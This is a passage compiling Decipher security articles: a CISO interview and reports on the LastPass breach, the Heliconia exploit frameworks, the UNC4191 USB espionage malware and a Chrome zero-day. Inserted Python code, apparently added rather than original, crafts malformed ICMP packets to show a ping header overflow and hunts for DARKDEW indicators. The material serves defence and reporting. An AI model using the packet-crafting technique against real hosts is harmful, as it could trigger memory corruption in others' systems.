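    return pkt[:IP_FIXED_HDR]


def overflow_in_reply(pkt: bytes) -> dict:
    """Walk a reply as pr_pack() does and report the overflow at each header copy."""
    outer_hlen = ip_header_len(pkt)
    report = {"outer": fixed_copy_overflow(pkt), "quoted": 0}
    icmp_type = pkt[outer_hlen]
    if icmp_type in ICMP_ERRORS_WITH_QUOTE:
        quoted = pkt[outer_hlen + ICMP_HDR:]
        if len(quoted) >= IP_FIXED_HDR:
            report["quoted"] = fixed_copy_overflow(quoted)
    return report


def build_samples():
    """Two constructed replies: a Time Exceeded quoting an echo request that had
    40 bytes of NOP options, and an Echo Reply whose own header carries 8 bytes
    of options."""
    echo_hdr = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1)
    quoted = build_ipv4_header(b"\x01" * IP_MAX_OPTIONS, len(echo_hdr)) + echo_hdr
    time_exceeded = (build_ipv4_header(b"", ICMP_HDR + len(quoted))
                     + struct.pack("!BBHHH", 11, 0, 0, 0, 0) + quoted)
    echo_reply = (build_ipv4_header(b"\x01" * 8, ICMP_HDR)
                  + struct.pack("!BBHHH", 0, 0, 0, 0x1234, 1))
    return time_exceeded, echo_reply


if __name__ == "__main__":
    for name, pkt in zip(("time exceeded", "echo reply"), build_samples()):
        print(name, overflow_in_reply(pkt),
              "bounded copy:", len(bounded_header_copy(pkt)), "bytes")
```

The Time Exceeded sample reports a clean outer header and a 40-byte overrun on the quoted one, which is the path a malicious or spoofing host controls entirely. The general rule the bug illustrates: a length field taken from the wire (here IHL) must never drive a copy into a fixed-size struct without a bound check.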

Q&A: Lucia Milica
By Lindsey O’Donnell-Welch (lindsey@decipher.sc), https://duo.com/decipher/q-and-a-lucia-milica

Lucia Milica, global resident CISO at Proofpoint, talks about how the CISO role has evolved and the challenges that CISOs face when interacting with the leadership team. Below is a transcribed version of the interview, which is part of a series of conversations by Decipher with CISOs across the security industry.

Lindsey O'Donnell-Welch: I would love to hear more about your own background.

Lucia Milică: So for me, I started into this space very early on, I began coding when I was 12. I was born and raised in Romania. So I began coding at 12. And I studied computer science in high school, I moved to the Bay Area very early on, and my first job was doing Y2K compliance for Wells Fargo Bank. So that was sort of the beginning, into the tech sector. But I think what's unique about my skill set, I'm passionate about law and technology. I love them both equally. Cybersecurity and privacy are both very near and dear to my heart. Now, taking a step back and looking back when I first started, I wouldn't necessarily have thought that I would end up in cybersecurity, primarily because cybersecurity was not a defined space nearly 30 years ago. So technology was a big area of influence. And for me, it was really the blend of technology, business, and law that I think ultimately have led me to where I am today.

I do feel that in many ways, I am a product of the CISO evolution, just kind of reflecting back at my career. So as I mentioned, I started early on doing coding, I got into IT infrastructure, so started as a systems engineer, as a sysadmin first, and over time, sort of graduated to a systems engineer role, like everybody else early in the days in the 90s, spent a lot of time with the MCSE certifications, and all the various different technology that sort of brought me up to being a systems engineer. But if I kind of take a step back and look at the pivotal steps, it's really moving in from systems engineering to more specifically around Active Directory and Exchange. And if we think of the threat landscape today, email is still one of the top threat vectors across the board and I've been focusing so much as an Active Directory engineer and expert, it was very much focused around access controls, authorization needs based permission, RBAC, I spent many years doing RBAC implementations. And this is way before we talked about needs-based permissions. So that was a big stepping stone. From there it was always a natural progression towards eDiscovery, and records retention. And it was probably my love for law in the background that has played a little bit into that. I didn't go to law school until years later. But at the same time, while I worked full time, I went to school at night. So all of my degrees were done as I continued to grow and progress in my career. And I feel like each one of my degrees really helped from undergrad to my MBA to my JD later on, and Masters in cyber, they all helped along the way with putting the business in perspective and understanding both the tech and the business side of the equation and really honing into the risk. But as I moved on from the natural extension from email, and running Exchange systems and architecting new technology, that sort of morphed over time to, as I mentioned, e-discovery and that investigation side of the house. 
I think that first stepping stone towards security, it was still very early on, and that sort of move towards more investigations, Governance Risk and Compliance became a big piece of it. But then from there, the next piece was getting more involved into M&A and integration as a result of M&A, that came into who's accessing what, network connectivity, safety, etc. to IP protections or intellectual property protections, and over time, got into running a lot more of the IT infrastructure space and being the only person with a security background in the room, it was a natural progression in my career into, you know, taking over security, taking over intellectual property. It was around that time when I started law school, that a lot was happening around data, supply chain vendor risk became a bigger concern. And I was one of those people that raised my hand to take it over. Like, let me figure it out first. So through that, they all helped shape the CISO that I later became, but those are all, I think, stepping stones that made me a well-rounded technology and business leader, where I could bring all of those pieces into one.

Lindsey O'Donnell-Welch: Was there any pivotal moment that made you decide to go down the CISO track?

Lucia Milică: That's probably now about 10 plus years ago. So at the time, I was running security without the CISO title. So I built security from the ground up, I was the security person and the privacy person, but I just had a VP of infrastructure type of role. And it was that time that I got more and more down to the data governance track, that I realized that okay, this is a conflict of interest, it was probably very early on and it was in law school, that I started thinking more in terms of risk, probably was my first year of law school, that I raised my hand to my CIO, and I said, "Look, I can do it all, so there's not a problem. Can I do it?" I believe that it is not right for me to own everything. I think we're getting into a point of conflict of interest. And if I am to take those like, which side do you want to be? Do you want to have security only, do you want to have security and privacy, privacy only or IT infrastructure, and that was a pivotal moment, when I said, "Well, I love IT infrastructure." And at that point, I was in it for over 20 years. So that's how long that's been. I felt like I knew IT. But security and privacy were something that I was so passionate about, that's when I basically raised my hand and said, "I would love to just own security and privacy." And we need the right checks and balances, we need to ensure that there is no conflict of interest in between. But I can put in all of those processes. And at the time, I was building data governance and overall security and privacy governance and implementing ISO 27001. And I was going through the various different layers of protection and checks and balances, it was very clear that I needed to decouple my ownership of IT infrastructure from the security side. And that was probably while I was trying to do everything prior to that, that was a defining moment where I said, "I'm only going to do this, this is where my passion lies. And this is where I think I can be more impactful for the organization."

Lindsey O'Donnell-Welch: What are some of your responsibilities?

Lucia Milică: So I'll tell you my day to day in my previous role compared to my day to day in this role, because I think it's really important. So in my previous role, I owned all aspects of data privacy and security, from corporate security to product security. So DevSecOps, privacy and security by design, and data governance, across the board and a day in the life was anything from meeting with execs trying to drive product consensus, trying to drive a culture of security, understanding what are the business goals and trying to achieve how I could enable those business goals securely, and really sort of that building that consensus and risk profile for the organization. I do feel that an effective CISO should have a strong business acumen. And so a lot of my job was probably interacting with the executive team and their deputies, their direct reports in the organization in terms of driving awareness, data ownership, controls, etc. And then there's the other aspect of it, of course, is you're always on call 24/7, working with your security operations team, making sure they have the eyes on the glass to see what's happening. So sort of a constant shift between business strategy, business enablement to threats and trying to make those decisions in near real time. Now, fast forward to today, in my current role, I run a team of advisory CISOs across the globe, so I don't have the internal operations responsibility as I did in the previous role. In this role, I'm primarily focused on the eight CISOs in my team around the globe, and we spend our time advising customer CISOs across the globe, which is a value-add for them as being customers, around what is top of mind, what are the top threats, what are some of the best practices that we as operational CISOs - every one of the CISOs on my team had been an operational CISO prior, so they've had experience in those roles - our CISO community broadly, in terms of what's top of mind, what are some of those best practices?
So a lot of what I do today is coaching and educating... and it doesn't matter where you are on the spectrum, I can be talking to a Fortune 10 global CISO or I can talk to someone where the company has 3,000 to 5,000 employees, right? So it doesn't really matter for us where you are on the scale, but if someone has a challenge or a program they're trying to undertake, like, "hey, I need better board metrics, you know, what are some of the other CISOs doing? What are your best practices? What have you learned about it? Can you help me on my board deck?" As an example, or "I'm undertaking a Data Governance Program end to end, what have you learned? Or what are others doing? How have you tackled this challenge? How are you working with execs?" So it's really being that trusted partner and sounding board to our overall sense of community that set the core of my role today. And that has been definitely a shift in mentality when I took this role. I wasn't quite 100 percent sure that this was the right next step, but I was very much driven by wanting to be impactful, and be able to help more than one company at a time. Being in the operational role was fantastic, right? Because you can get into the depth of that technology, can really shape how you mature the security program and drive the culture of security. But you do so one company at a time. So that's time that you invest in transforming that program; in this role, it gives me the opportunity to impact more than one company at a time. And really, I wanted to use my knowledge and experience to be impactful and be able to give back to the CISO community.

Lindsey O'Donnell-Welch: How has the job of CISO evolved over time?

Lucia Milică: Yeah, so it's interesting. And I think I mentioned earlier that I do feel that I am the product of the CISO evolution. Over time - it was maybe 20, 25 years ago when I started what was a very technical role - you probably know that the CISO title did not really exist. It was just a portion of someone's responsibility, which was the case for me. So that role, I think, has started as a traditional technical role to what now has shifted to more of a business and a risk role. And while you still have to have the technical acumen, I think there's still a stronger need for business and risk acumen and being able to communicate. But just thinking through the last 10 years, the role and complexity has changed and morphed, while we traditionally just focused on intrusion, perimeter-first technology, to a business enablement role. The digital transformation has really accelerated business enablement for a lot of organizations, but brought with it a number of more complexities. We live in a very decentralized mesh technology world, and so is the data. And when you add to that the sophistication and volume of cyber attacks that we have seen over the last several years, it really has elevated that cybersecurity role to the board level in most recent years, but also the skill sets that are required for a CISO to be successful in their role shifted from needing to understand industry to now needing to understand framework and policy and governance and oversight and geopolitical issues, nation state attacks, to business enablement to rapid emerging tech, as just a few of the examples of how this role has changed. Now, in addition to that, you have to think through what is your impact for the company's bottom line, the P&L? Cyber risk is business risk.
And it's really important that a CISO is able to understand the business goals, understand the board's responsibility for creating shareholder value and be able to enable the business to achieve those goals while doing so securely. So those conversations were not taking place, 15, 20 years ago - not even 10 years ago - right? We started seeing that shift. But that has really been drastically accelerated over the last several years due to the digitization and commercialization of our overall business systems that we heavily rely on to enable businesses.

Lindsey O'Donnell-Welch: Do you see a future evolution of the CISO role continuing in the future?

Lucia Milică: Oh, absolutely. And we've seen a number of headlines, of course, in the news recently. Gartner came out and said that they expect that by the year 2025 cybersecurity will become a priority for boards, which it absolutely has become - and I'll give you some stats from the recent board of directors survey that we conducted - but also they said by the year 2025, 40 percent of boards will have dedicated cyber committees or at least one qualified board member overseeing cyber risk in their organization. We have started seeing, for example, the Delaware Supreme Court Chief Justice Collins Seitz said that boards must be able to demonstrate proactively that they are thinking about systemic risk within the organization. Twitter, of course, we had Mudge's testimony from the Senate about the capability of the executive team to understand the scope of cyber risk broadly, you had the SolarWinds shareholder derivative. I mean, there's so many different breadcrumbs throughout. We recently conducted our Cybersecurity: The 2022 Board Perspective, where we surveyed 600 board members from organizations of 5,000 employees and higher, in asking about trying to understand their sentiment, vis-a-vis cybersecurity, but also how do they engage with their CISO, what did they value most in the CISO, etc. And a few other stats that I think are really important is that while CISOs and board members came from different backgrounds, diverse backgrounds, they're really bringing a different color of their overall perception of risk broadly. And so one example is the disconnect between CISOs and boards when it comes to security. We've seen in this report that 65 percent of board members globally believe that their organization is at risk of material cyber attacks in the next 12 months. And that compares to 48 percent of CISOs. So those numbers are a little bit different. Now in the U.S. specifically, this disconnect is even higher amongst all the countries that we surveyed, we have 78 percent of boards as opposed to 34 percent of CISOs. So you've seen some example of that disconnect between CISOs and boards.

Lindsey O'Donnell-Welch: What are the top challenges that CISOs face in interacting with board members or other C-Suite executives?

Lucia Milică: Absolutely, I think there are a number of other challenges. So, one of the questions that we had is about seeing eye to eye with their CISO, we asked the same question of the boards. And of course, you have a higher number, and I don't recall exactly the number, but there was somewhere in the 60th percentile of board members believe that they see eye to eye with their CISOs versus only 51 percent of CISOs believe that they see eye to eye with their boards. And there are a number of other stats throughout. But to me it really goes to the communication disconnect that we have. And it's no surprise that we saw the Gartner prediction that proposed SEC cyber rules that are slated to come out in April 2023. So the jury's out about what that final rule will look like, however, something that is clear is that we've seen a trend of the need for cybersecurity expertise on boards. And while of course, you know, board members have a wide array of experience and knowledge, etc. Cyber Risk is a complex topic, it really does require a good level of understanding on how this manifests down the rabbit hole to truly ascertain the full systemic risk impact that cybersecurity can have on the broader organization, but also the ecosystem outside. I mean, take for example, you know, SolarWinds and how that had ripple effects with their customers across the environment. And we've seen that with Log4j and Follina, and some of the other ones as examples of how this can get out of control really quick. So, being able to truly ascertain cyber risk as part of your broader business risk is not only a communication matter, but it's also the ability to understand and absorb that information. And I think you'll need a little bit of both.
While CISOs need to continue working on translating technology and technical risk into business risk and be able to better deliver that risk story to their board, at the same token the other side of the aisle, right, we need the board to be able to understand the true implication of cyber risk on the ultimate shareholder value and business goals.

Lindsey O'Donnell-Welch: When you're looking at a business do you have this concept of security-focused culture in mind? Do you start there and who needs to be involved in those conversations?

Lucia Milică: So for me, it starts at the top. You have to have the support of the executive team. So it's interesting, right? Because while you have a number of boards and execs that understand that cybersecurity matters, there is a difference between knowing that it's important and actually prioritizing. So to me, it's really, really imperative that you have the right support at the top, that you have the right executive backing, to be able to be impactful and make a difference. Now, successful CISOs are able to build and drive that culture broadly around organizations, there's a lot of awareness and education that needs to happen, that can be abrasive or can be mandated, right? So while you need to have that support, you need to do so in a way that you can look not only on the bottom line, but how are you able to enable your end users and the broader employee community to do their jobs and do so securely? Their role is not to understand all the intricacies of security risk. And while it's important, cybersecurity is everyone's job, and everybody's responsibility, and driving that culture is easier said than done, right? Because it takes time, it's multi year, and it has to be multifaceted. At the same token, we can't expect every one of our employees to be cybersecurity experts. So that has to be somewhere in between, in the middle between driving the culture, driving awareness and building those behaviors over time and understanding the user behavior. There are also aspects of it to where you have to be able to implement the right controls, to pick up everything else, so that users can do their job securely. But it really has to start at the top, you need to have a top-down and bottom-up approach.
I will give you an example; my last role, while I spent a lot of time doing awareness and education with our CEO and our executive team across in terms of business impact, and valuation impact and risk and having those tough conversations around risk and mitigations, at the same token, my team and I would spend time with our engineering team doing brown bag lunch and learn events in terms of secure coding, and what to be aware of and focus on vulnerabilities and why things matter. So you have to be able to dive into the details with everybody else, whether they're engineers or customer success or IT across the organization. At the same token you need to be able to elevate that conversation up with the board and executive team and meet somewhere in the middle. That's a transformative project, it takes time, there are a number of nuances that go into it and into making one of those programs successful. The check-the-box security awareness training and phishing test is not enough. You need to think through those systematically and in a multifaceted way.

Lindsey O'Donnell-Welch: Are there any security threats that you think that organizations should be most aware of right now, especially going into 2023?

Lucia Milică: Absolutely, I want to call out a couple of them that actually were in our Voice of the CISO report, because I do think they are very much still top of mind for the security leaders across the globe. And one, the biggest one that we have seen a huge increase is insider risk, insider threats. That in itself has been not only called out by our Voice of the CISO - for which we interviewed 1,400 CISOs globally - as the top cyber threat that they are focusing on. But we have also seen in a number of our own reports the insider threat rising exponentially across the board. So I think that is going to continue to be a huge area for security leaders across the board. Interestingly, though, in our board report that was lower down on the list. The second one that continues to be an area that we all struggle with is supply chain risk. There's not a clear answer to solving it. We all know it's a challenge. We all rely on the limited toolsets that we have today. But that I think is a big area of concern in terms of cyberthreats and one that we're all trying to wrap our heads around.... And really, I think, at the core of it all, those are some of the examples, we really need to take a step back and get back to the core, which is that cybercriminals are continuing to target and exploit people. And we have to be able to focus on that multi-layer protection and strategy against the social engineering and overall, the human factor exploitations. We see that more than 90 percent of threats observed require some sort of a human interaction to execute. And those threat actors are regularly leveraging topical, timely, social, relevant themes as lures. And it's really important to be able to double down and focus on that human element as a defined layer of defenses for your organization, as a non-negotiable. We've figured out our basic hygiene, and that's absolutely critical, you need to still focus on the basic hygiene, focusing on the people layer is key.
And then last, but not least, data, as we know, is at the core of what threat actors are after, data is the new currency, as we all know. So focusing on defending the data broadly is really, really important. And actually, both the Voice of the CISO and the Board report have information protection, data governance, data classification as the top area of focus for the next 24 months for both CISOs and board members, which really underscored the need to focus on a broad data governance strategy.

LastPass Says Attacker Accessed Customer Data
Dennis Fisher, https://duo.com/decipher/lastpass-says-attacker-accessed-customer-data

An attacker recently gained access to an outside cloud storage service used by LastPass and was able to obtain customer data, the company said Wednesday.

LastPass CEO Karim Toubba said that the intruder used some data stolen during a previous attack on the company’s network in order to get access to the cloud storage system. In August, LastPass disclosed that an attacker had compromised a developer account inside the company and used that access in order to steal some of the company’s source code and other information.

“We have determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain elements of our customers’ information. Our customers’ passwords remain safely encrypted due to LastPass’s Zero Knowledge architecture,” Toubba said.

“We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional.”

Toubba said that none of the company’s products or services were affected by the intrusion. The August incident seems to have been more serious than the most recent one, and it is clearly still having effects. That intrusion lasted several days and the attacker had direct access to the LastPass development environment. The good news in that case was that the development environment has no connection to the production environment, but whatever information the attacker was able to steal in that incident aided the second intrusion.

“Our investigation determined that the threat actor gained access to the Development environment using a developer’s compromised endpoint. While the method used for the initial endpoint compromise is inconclusive, the threat actor utilized their persistent access to impersonate the developer once the developer had successfully authenticated using multi-factor authentication,” Toubba said of the August incident.

“Although the threat actor was able to access the Development environment, our system design and controls prevented the threat actor from accessing any customer data or encrypted password vaults.”

LastPass’s password manager is used widely by enterprises as well as consumers.

Google Exposes Heliconia Exploit Framework Targeting Chrome, Firefox, Windows
Dennis Fisher, https://duo.com/decipher/google-exposes-heliconia-exploit-framework-targeting-chrome-firefox-windows

Google’s Threat Analysis Group has published details about a trio of newly discovered exploit frameworks that likely were used to exploit Chrome, Firefox, and Microsoft Defender vulnerabilities as zero days in the last few years.

The TAG team became aware of the frameworks when someone submitted three separate bugs to Google’s Chrome bug reporting system. Each of the three bugs included a complete framework for exploiting specific bugs, as well as source code. The frameworks are known as Heliconia Noise, Heliconia Soft, and Heliconia Files. Heliconia Noise is a framework that includes a full one-click chain for exploiting a renderer bug in Chrome that was present in the browser from version 90.0.4430.72 to 91.0.4472.106 and was fixed in August 2021. Heliconia Soft exploits a flaw in Windows Defender, and Heliconia Files is a group of exploits for Firefox on both Windows and Linux.

While looking into the vulnerabilities and frameworks, Google’s researchers discovered a script that was used to remove any sensitive information, such as server names and developer aliases, and it also contains a reference to Variston, which is a security firm in Spain. The TAG researchers believe Variston may have developed the exploit frameworks.

“Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox and Microsoft Defender and provides all the tools necessary to deploy a payload to a target device. Google, Microsoft and Mozilla fixed the affected vulnerabilities in 2021 and early 2022. While we have not detected active exploitation, based on the research below, it appears likely these were utilized as zero-days in the wild,” the TAG researchers said in a post detailing the bugs and frameworks.

Google’s research shows that the frameworks are complex and mature and capable of delivering exploits to target machines with ease. The Heliconia Noise framework that targets Chrome has several components and also a reference to a separate sandbox escape exploit. The first stage of the chain is the use of a remote code execution exploit, followed by the sandbox escape, and finally the installation of an agent on the compromised machine.

“The framework runs a Flask web server to host the exploit chain. A full infection performs requests to six different web endpoints during the different stages of the exploit chain. The file names for each endpoint are randomized during server deployment, except for the first endpoint, which is served by a URL specified in the configuration file,” the Google researchers said.

“The framework allows setting parameters to validate visitors of the web server. Customers can configure target validations based on user agent, client country, client IP, and a client identifier used to track individual visitors. If any of the validation checks fail, the user is redirected to the preconfigured redirect URL.”

Heliconia Soft, which targets the Windows Defender security tool, contains an exploit for CVE-2021-42298, a flaw that Microsoft patched in 2021. The framework uses an exploit that gives the attacker system-level privileges and only involves the download of a PDF. When the victim downloads the PDF, it triggers a scan by Windows Defender.

“In the first stage, a PDF is served when a user visits the attack URL. The PDF contains some decoy content, plus JavaScript that contains the exploit. Like Heliconia Noise, it uses the custom JavaScript obfuscator minobf. The framework code performs checks to confirm that common exploit strings (“spray”, “leak”, “addr”, etc.) are not present in the obfuscated JavaScript. The framework inserts the PE loader shellcode and the launcher DLL as strings in the exploit JavaScript,” the Google analysis says.

The final framework TAG discovered is Heliconia Files, and it contains an exploit for a Firefox bug that Mozilla patched earlier this year. That vulnerability (CVE-2022-26485) was exploited in the wild before it was disclosed in March, and Google’s researchers believe actors may have been using the exploit contained in the Heliconia Files framework for several years.

“TAG assesses that the Heliconia Files package likely exploited this RCE vulnerability since at least 2019, well before the bug was publicly known and patched. The Heliconia exploit is effective against Firefox versions 64 to 68, suggesting it may have been in use as early as December 2018 when version 64 was first released,” TAG said.

“Additionally, when Mozilla patched the vulnerability, the exploit code in their bug report shared striking similarities with the Heliconia exploit, including the same variable names and markers. These overlaps suggest the exploit author is the same for both the Heliconia exploit and the sample exploit code Mozilla shared when they patched the bug.”

There is also a sandbox escape exploit for the Windows version of Firefox. Google’s TAG researchers pointed to Heliconia as an example of the proliferation of commercial surveillance tools and how dangerous they can be for many groups of potential targets.

“The growth of the spyware industry puts users at risk and makes the Internet less safe, and while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups,” the researchers said.

New Chinese Cyberespionage Campaign Targets Asia, US
Dennis Fisher, https://duo.com/decipher/new-chinese-cyberespionage-campaign-targets-asia-us

A recently discovered attack campaign likely run by threat actors in China has been targeting public and private organizations in the Philippines, Europe, and the United States for perhaps as long as a year using multi-stage malware that is capable of self-replicating and is designed to steal data.

The campaign may have been ongoing since September 2021 but researchers at Mandiant discovered it recently, and found that the threat actor is relying on the older technique of deploying USB drives with malware on them as the initial infection vector. The attack includes the use of legitimate tools as well as several new pieces of malware, one of which has the ability to self-replicate onto new drives.

“Following initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE. Successful compromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s system, providing backdoor access to the threat actor,” an analysis by Mandiant researchers published Monday says.

“The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems.”

Unlike some other malware campaigns that rely on infected USB drives, the malware in this campaign does not execute automatically when a victim inserts the drive into a computer. Rather, the victim has to manually execute one of two files on the drive, both of which are renamed versions of a legitimate application called USB Network Gate. Once the victim executes one of those binaries, it sideloads the MISTCLOAK malware, which disguises itself as a DLL.

MISTCLOAK is essentially a launcher that reads an encrypted file named usb.ini, which houses the second-stage payload, DARKDEW. That payload can be executed from either a removable drive or a hard drive.

“If executed from a removable drive, DARKDEW will launch explorer.exe via explorer.exe “<drive>:\autorun.inf\Protection for Autorun” where <drive> is a removable drive letter, such as “E”. DARKDEW will then check if either C:\ProgramData\udisk\disk_watch.exe or C:\ProgramData\udisk\DateCheck.exe exist and will create the directory C:\ProgramData\udisk if neither are found,” the Mandiant analysis says.

After that’s done, the malware copies all of the files from specific directories, then copies the modified USB Network Gate binary to disk and creates a registry key to establish persistence. It then installs a file called datecheck.exe, which is a renamed version of another legitimate app called Razer Chromium Render Process. That app loads a legitimate DLL that in turn calls a function from the BLUEHAZE malware component. BLUEHAZE then creates its own registry key for persistence and opens a reverse shell to a hard-coded C2 address.
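A defender-side hunt for the DARKDEW indicators the Mandiant description above gives, written as an added example (not Mandiant's tooling): the autorun.inf directory abuse, the usb.ini stager, the ProgramData\udisk drop location and the explorer.exe launch string, run over a constructed sample tree. The indicator labels, the sample drive layout and the drive letters are my own assumptions; only the paths and file names come from the page.

```python
"""Hunt for on-disk and process-command-line indicators of the MISTCLOAK/DARKDEW
USB infection chain. Added example; the sample tree below is constructed, not
real data, and every path or file name is taken from the Mandiant description."""
import os
import tempfile

# Indicators quoted from the Mandiant analysis on this page.
STAGER_FILE = "usb.ini"                    # encrypted file MISTCLOAK reads to load DARKDEW
AUTORUN_DIR = "autorun.inf"                # DARKDEW launches explorer.exe on this *directory*
AUTORUN_SUBDIR = "Protection for Autorun"  # "<drive>:\autorun.inf\Protection for Autorun"
UDISK_SUBPATH = os.path.join("ProgramData", "udisk")     # C:\ProgramData\udisk on a real host
DROPPED_BINARIES = ("disk_watch.exe", "DateCheck.exe")   # DARKDEW checks for these under udisk


def hunt_removable_drive(drive_root):
    """Return indicator labels (assumed names) found on a mounted removable drive."""
    hits = []
    autorun = os.path.join(drive_root, AUTORUN_DIR)
    # A legitimate autorun.inf is a file; DARKDEW abuses a directory of that name.
    if os.path.isdir(autorun):
        hits.append("autorun.inf-is-directory")
        if os.path.isdir(os.path.join(autorun, AUTORUN_SUBDIR)):
            hits.append("protection-for-autorun-subdir")
    if os.path.isfile(os.path.join(drive_root, STAGER_FILE)):
        hits.append("usb.ini-stager")
    return hits


def hunt_system_drive(system_root):
    """Return indicator labels for the DARKDEW drop location on the host's system drive."""
    udisk = os.path.join(system_root, UDISK_SUBPATH)
    hits = []
    if not os.path.isdir(udisk):
        return hits
    # Compare case-insensitively: the page spells the file both DateCheck.exe and datecheck.exe.
    present = {name.lower() for name in os.listdir(udisk)}
    for name in DROPPED_BINARIES:
        if name.lower() in present:
            hits.append("udisk-" + name.lower())
    return hits


def is_darkdew_explorer_cmdline(cmdline):
    """True when a process command line matches DARKDEW's explorer.exe launch pattern."""
    c = cmdline.lower().replace("/", "\\")
    return "explorer.exe" in c and "\\autorun.inf\\protection for autorun" in c


def build_constructed_sample():
    """Create a temp tree mimicking an infected drive (E), a host (C) and a clean drive (F)."""
    base = tempfile.mkdtemp(prefix="darkdew-hunt-")
    drive = os.path.join(base, "E")
    host = os.path.join(base, "C")
    clean_drive = os.path.join(base, "F")
    os.makedirs(os.path.join(drive, AUTORUN_DIR, AUTORUN_SUBDIR))
    with open(os.path.join(drive, STAGER_FILE), "wb") as f:
        f.write(b"\x00CONSTRUCTED-OPAQUE-BLOB")  # stands in for the encrypted second stage
    os.makedirs(os.path.join(host, UDISK_SUBPATH))
    with open(os.path.join(host, UDISK_SUBPATH, "datecheck.exe"), "wb") as f:
        f.write(b"MZ")  # placeholder, not the renamed Razer binary
    os.makedirs(clean_drive)
    with open(os.path.join(clean_drive, AUTORUN_DIR), "w") as f:
        f.write("[autorun]\n")  # an ordinary autorun.inf *file* must not trigger
    return drive, host, clean_drive


if __name__ == "__main__":
    infected, host, clean = build_constructed_sample()
    print("removable drive:", hunt_removable_drive(infected))
    print("system drive:", hunt_system_drive(host))
    print("clean drive:", hunt_removable_drive(clean))
    sample_cmd = r'explorer.exe "E:\autorun.inf\Protection for Autorun"'  # constructed
    print("explorer launch matches:", is_darkdew_explorer_cmdline(sample_cmd))
```

On a real host the same functions would be pointed at the mounted drive root and the system drive, and the command-line check at process-creation telemetry.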

Mandiant attributed the campaign to an uncategorized actor it calls UNC4191 and said that the actor is likely located in China and its actions are aligned with the Chinese government’s political and economic goals.

“We believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China’s political and commercial interests. Our observations suggest that entities in the Philippines are the main target of this operation based on the number of affected systems located in this country that were identified by Mandiant,” the researchers said.

Google Patches Heap Overflow Zero Day in Chrome
Dennis Fisher, https://duo.com/decipher/google-patches-heap-overflow-zero-day-in-chrome

Google has released an update for Chrome on the desktop and Android that fixes a high-risk vulnerability that has been exploited in the wild.

The vulnerability (CVE-2022-4135) is a heap buffer overflow in Chrome’s GPU and could allow an attacker to execute arbitrary code on a target device. This is the eighth vulnerability that has been actively exploited in Chrome that Google has patched this year.

“Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page,” the bug description says.

The bug is in all versions of Chrome prior to 107.0.5304.121, and it affects both desktop and Android versions. Clement Lecigne of Google’s Threat Analysis Group reported this vulnerability, which lends some context to the discovery of an in-the-wild exploit. TAG is Google’s in-house team that tracks state-backed actors and APT groups and works to disrupt their operations. The group often identifies threat actors using exploits for zero days in the wild, and this is the third Chrome zero day that Lecigne has reported in 2022, along with a zero day in Internet Explorer.

It has been another busy year for researchers identifying exploits used in the wild for zero day vulnerabilities. In 2021, there were 68 such vulnerabilities reported publicly, and so far in 2022 there have been at least 33, according to data compiled by Google Project Zero researcher Maddie Stone.

Organizations that deploy Chrome on the desktop and/or on Android devices should update to 107.0.5304.121 or later as soon as possible. Chrome downloads updates in the background but only applies them when the browser is relaunched, so long-running sessions should be restarted, and managed fleets should verify the installed build rather than assume auto-update has completed.
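A fleet check for this advisory, added here as an example in Python (it is not code from Google or from the article): it extracts the build number from the version banner each endpoint reports, compares it numerically against the fixed build quoted above, and lists the hosts that still need the update or whose banner could not be read. The inventory is constructed sample data, and the banner format assumed is the "Google Chrome 107.0.5304.121" line that `google-chrome --version` prints.

```python
"""Check Chrome builds in an inventory against the first build fixed for CVE-2022-4135."""
from __future__ import annotations

import re

# First build containing the fix, taken from the Chrome bug description quoted above.
FIXED_VERSION = "107.0.5304.121"

# Matches the dotted build number inside a banner such as "Google Chrome 107.0.5304.121"
# (the format `google-chrome --version` prints; assumed here, not quoted by the article).
VERSION_RE = re.compile(r"\b(\d+\.\d+\.\d+\.\d+)\b")


def parse_version(version: str) -> tuple[int, int, int, int]:
    """Turn "107.0.5304.121" into (107, 0, 5304, 121).

    Integer tuples compare numerically; comparing the raw strings would rank
    "107.0.5304.99" as newer than "107.0.5304.121", which is wrong.
    """
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Chrome build number: {version!r}")
    major, minor, build, patch = (int(p) for p in parts)
    return major, minor, build, patch


def version_from_banner(banner: str) -> str | None:
    """Extract the build number from a --version banner, or None if absent."""
    match = VERSION_RE.search(banner)
    return match.group(1) if match else None


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed build is older than the first fixed build."""
    return parse_version(installed) < parse_version(fixed)


def hosts_needing_update(inventory: dict[str, str]) -> list[str]:
    """Hosts whose banner shows a build older than FIXED_VERSION, plus hosts whose
    banner could not be parsed (treated as unknown and therefore listed)."""
    flagged = []
    for host, banner in inventory.items():
        version = version_from_banner(banner)
        if version is None or is_vulnerable(version):
            flagged.append(host)
    return sorted(flagged)


# Constructed sample inventory: hostname -> banner collected from each endpoint.
SAMPLE_INVENTORY = {
    "ws-001": "Google Chrome 107.0.5304.121",
    "ws-002": "Google Chrome 107.0.5304.99",    # older build despite the "larger" last field as a string
    "ws-003": "Google Chrome 106.0.5249.119",
    "ws-004": "Google Chrome 108.0.5359.71",
    "ws-005": "chrome: command not found",      # unparsable, reported for manual follow-up
}

if __name__ == "__main__":
    for host in hosts_needing_update(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]!r} -> update to {FIXED_VERSION} or later")
```

Unparsable banners are listed rather than silently skipped, since a host that cannot report its Chrome build is exactly the one most likely to have been missed by auto-update.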

